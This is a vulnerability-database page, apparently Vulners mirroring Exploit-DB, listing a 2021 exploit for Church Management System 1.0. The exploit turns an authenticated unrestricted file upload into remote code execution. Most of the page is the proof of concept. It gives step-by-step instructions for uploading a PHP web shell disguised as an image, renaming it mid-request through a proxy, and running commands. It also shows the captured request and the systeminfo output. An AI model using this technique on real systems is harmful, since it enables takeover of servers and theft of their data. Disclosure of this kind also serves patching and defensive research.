Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Church Management System 1.0 - Arbitrary File Upload (Authenticated)

🗓️ 05 Jul 2021 00:00:00Reported by Murat DEMİRCİType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 305 Views

Unrestricted file upload in Church Management System 1.0 allows remote code execution for authenticated users.

Code
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A

# Proof of Concept :

1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.


###################### REQUEST ##########################################

GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc

####################### RESPONSE #########################################

HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8


Host Name:                 MRT
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19043 N/A Build 19043
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Murat  
System Boot Time:          6/25/2021, 2:51:40 PM
System Manufacturer:       Dell Inc.
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.


############################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jul 2021 00:00Current
7.4High risk
Vulners AI Score7.4
file uploadremote code executionauthenticated accessuser profilesecurity vulnerabilityproof of concept
305